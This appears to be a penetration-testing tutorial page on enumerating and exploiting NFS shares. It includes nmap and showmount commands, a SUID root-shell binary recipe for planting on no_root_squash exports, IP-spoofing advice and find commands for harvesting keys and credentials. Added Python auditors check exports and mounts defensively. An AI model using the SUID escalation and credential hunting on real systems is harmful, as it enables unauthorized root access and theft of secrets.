# NFS Service - Port 2049

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop**](https://shop.verylazytech.com/) for e-books and courses. 📚
  {% endtab %}
  {% endtabs %}

## Basic info

The **Network File System (NFS)** allows file sharing across Unix-like systems over a network. While convenient, NFS often exposes sensitive data and trust relationships due to misconfigurations or outdated security models. This guide delivers in-depth methods for discovering, analyzing, and exploiting NFS services during penetration testing engagements.

### Identifying NFS Services During Network Reconnaissance

#### Port Scanning and Service Enumeration

NFS uses the following ports:

* **TCP/UDP 2049** – NFS Service
* **TCP/UDP 111** – Portmapper (rpcbind)

Run a detailed Nmap scan:

```bash
nmap -sV -sT -p 111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <target-ip>
```

Review the script output for exposed mount points and exports.

***

### Enumerating NFS Exports

#### Using `showmount`

Check accessible NFS shares:

```bash
showmount -e <target-ip>
```

Example output:

```
Export list for 10.0.0.1:
/home           *
/var/nfs        192.168.0.0/24
```

* `*` means the export is accessible from any host
* A CIDR range limits the export to hosts in that trusted network

#### Bypassing IP-based Access Controls

Use spoofed IP addresses or proxy through a host in an allowed subnet. In some cases, misconfigured DNS resolution can allow access even when IP-based restrictions are in place.

***

## Mounting NFS Shares and Privilege Analysis

### Mounting an Export Locally

```bash
mkdir /mnt/nfs
mount -t nfs <target-ip>:/home /mnt/nfs
```

Check for files with improper permissions and for files that contain user credentials.

### UID/GID Mappings and Root Squashing

By default, NFS applies **root squashing**: requests from a remote root user are mapped to the unprivileged `nfsnobody` account. Check the server's `/etc/exports` for the `no_root_squash` option:

```
/home *(rw,sync,no_root_squash)
```

If `no_root_squash` is set, root on a client is treated as root on the exported files, which allows privilege escalation.
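To review a server for this setting, the following added example (not code from the original page) parses `/etc/exports` text and reports `no_root_squash`, `insecure`, and unrestricted clients. The sample input is constructed apart from the `/home` line shown above, and the function names and finding codes are illustrative.

```python
import re

# Findings a reviewer cares about, keyed by the code audit_exports() reports.
REASONS = {
    "no_root_squash": "client root keeps UID 0 on the export",
    "insecure": "requests accepted from unprivileged source ports",
    "any_host": "no client restriction: any host may mount",
    "any_host_rw": "any host may mount with write access",
}
CLIENT_RE = re.compile(r"^(?P<host>[^()\s]*)(?:\((?P<opts>[^)]*)\))?$")

# Constructed sample; only the /home line appears on this page.
SAMPLE_EXPORTS = """\
# /etc/exports
/home *(rw,sync,no_root_squash)
/var/nfs 192.168.0.0/24(rw,sync)
/srv/build buildhost(ro) (rw,insecure)
"""


def parse_exports(text):
    """Yield (path, client, options) for every client on every export line."""
    # Join backslash-continued lines, then strip comments and blanks.
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            m = CLIENT_RE.match(spec)
            if m:
                # A bare "(opts)", e.g. after a stray space, applies to any host.
                host = m.group("host") or "*"
                yield path, host, set(filter(None, (m.group("opts") or "").split(",")))


def audit_exports(text):
    """Return [(path, client, finding_code)] in file order."""
    findings = []
    for path, host, opts in parse_exports(text):
        findings += [(path, host, o) for o in ("no_root_squash", "insecure") if o in opts]
        if host == "*":
            findings.append((path, host, "any_host_rw" if "rw" in opts else "any_host"))
    return findings


if __name__ == "__main__":
    for path, host, code in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {host}: {code} ({REASONS[code]})")
```

The third sample line shows the whitespace pitfall: the space before `(rw,insecure)` turns it into a separate entry that applies to every host.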

***

## Exploiting no\_root\_squash for Remote Code Execution

### Step-by-Step Attack

1. **Create a SUID Binary on Mounted Share**

   ```bash
   echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\nint main(){setuid(0); system("/bin/bash");}' > rootsh.c
   gcc rootsh.c -o rootsh
   chmod +s rootsh
   mv rootsh /mnt/nfs/
   ```
2. **Trigger Execution on Target**\
   If the NFS share is mounted by a target system, wait for the binary to sync and then trigger execution through a scheduled task or user login.
3. **Gain Shell with Root Privileges**
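The steps above depend on the client honoring set-ID bits on the mounted share, which the `nosuid` mount option disables. This added example (not from the original page) reads `/proc/mounts`-format text, reports NFS mounts missing `nosuid` or `nodev`, and lists set-ID files under a directory; the sample mount table and function names are constructed for illustration.

```python
import os
import re
import stat

NFS_TYPES = {"nfs", "nfs4"}
REQUIRED = ("nosuid", "nodev")  # make the kernel ignore set-ID bits and device nodes

# Constructed sample in /proc/mounts format (device, mountpoint, type, options, ...).
SAMPLE_MOUNTS = """\
10.0.0.1:/home /mnt/nfs nfs4 rw,relatime,vers=4.2 0 0
10.0.0.1:/var/nfs /mnt/shared\\040data nfs rw,nosuid,relatime 0 0
fileserver:/pub /mnt/pub nfs ro,nosuid,nodev,noexec 0 0
/dev/sda1 / ext4 rw,relatime 0 0
"""


def _unescape(field):
    # /proc/mounts encodes spaces and similar characters as three-digit octal escapes.
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), field)


def weak_nfs_mounts(mounts_text):
    """Return [(mountpoint, [missing options])] for NFS mounts lacking REQUIRED."""
    weak = []
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[2] not in NFS_TYPES:
            continue
        missing = [o for o in REQUIRED if o not in fields[3].split(",")]
        if missing:
            weak.append((_unescape(fields[1]), missing))
    return weak


def find_setid_files(root):
    """Return sorted [(path, owner_uid, 'suid' or 'sgid')] for regular files under root."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                kind = "suid" if st.st_mode & stat.S_ISUID else "sgid"
                hits.append((path, st.st_uid, kind))
    return sorted(hits)


if __name__ == "__main__":
    for mountpoint, missing in weak_nfs_mounts(SAMPLE_MOUNTS):
        print(f"{mountpoint}: missing {','.join(missing)}")
```

On a live client, pass the contents of `/proc/mounts` to `weak_nfs_mounts()` and run `find_setid_files()` on each mountpoint it reports.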

***

## Enumerating and Extracting Sensitive Files

### Commands to Discover Valuable Files

```bash
find /mnt/nfs -type f -name "*.conf"
find /mnt/nfs -type f -name "*.pem"
find /mnt/nfs -type f -perm -4000
```

Look for:

* SSH private keys
* Database credentials
* Password backup files
* Misconfigured `.bashrc`, `.profile`, or crontabs

***
